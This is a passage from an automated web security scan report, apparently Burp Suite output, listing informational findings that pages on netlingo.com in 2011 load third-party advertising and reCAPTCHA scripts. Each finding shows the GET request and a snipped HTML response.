<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1189. http://www.netlingo.com/top50/acronyms-for-parents.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /top50/acronyms-for-parents.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/acronyms-for-parents.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1190. http://www.netlingo.com/top50/business-text-terms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /top50/business-text-terms.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/business-text-terms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1191. http://www.netlingo.com/top50/common-expressions.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /top50/common-expressions.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/common-expressions.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1192. http://www.netlingo.com/top50/funniest-terms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /top50/funniest-terms.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/funniest-terms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1193. http://www.netlingo.com/top50/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /top50/index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1194. http://www.netlingo.com/top50/newbie-terms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /top50/newbie-terms.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/newbie-terms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1195. http://www.netlingo.com/top50/popular-text-terms.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /top50/popular-text-terms.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /top50/popular-text-terms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:53:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 37694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1196. http://www.netlingo.com/unsubscribe.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /unsubscribe.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /unsubscribe.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 32797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1197. http://www.netlingo.com/word-of-the-day/aotd.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word-of-the-day/aotd.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word-of-the-day/aotd.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1198. http://www.netlingo.com/word-of-the-day/business.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word-of-the-day/business.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word-of-the-day/business.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1199. http://www.netlingo.com/word-of-the-day/feeds.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word-of-the-day/feeds.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word-of-the-day/feeds.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1200. http://www.netlingo.com/word-of-the-day/jargon.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word-of-the-day/jargon.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word-of-the-day/jargon.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1201. http://www.netlingo.com/word-of-the-day/technical.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word-of-the-day/technical.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word-of-the-day/technical.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:45:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1202. http://www.netlingo.com/word/53x.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/53x.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/53x.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1203. http://www.netlingo.com/word/aor.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/aor.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/aor.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1204. http://www.netlingo.com/word/buff.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/buff.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/buff.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1205. http://www.netlingo.com/word/cu46.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/cu46.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/cu46.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1206. http://www.netlingo.com/word/dead-cell-phones.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/dead-cell-phones.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/dead-cell-phones.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1207. http://www.netlingo.com/word/dead-computers.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/dead-computers.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/dead-computers.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:56:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1208. http://www.netlingo.com/word/digitally-grounded.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/digitally-grounded.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/digitally-grounded.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:58:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1209. http://www.netlingo.com/word/do-not-track.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/do-not-track.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/do-not-track.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:57:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 42141

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</a>                    
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
                                   <script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1210. http://www.netlingo.com/word/elancers.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlingo.com
Path:   /word/elancers.php

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
  • http://api.recaptcha.net/js/recaptcha_ajax.js
  • http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /word/elancers.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
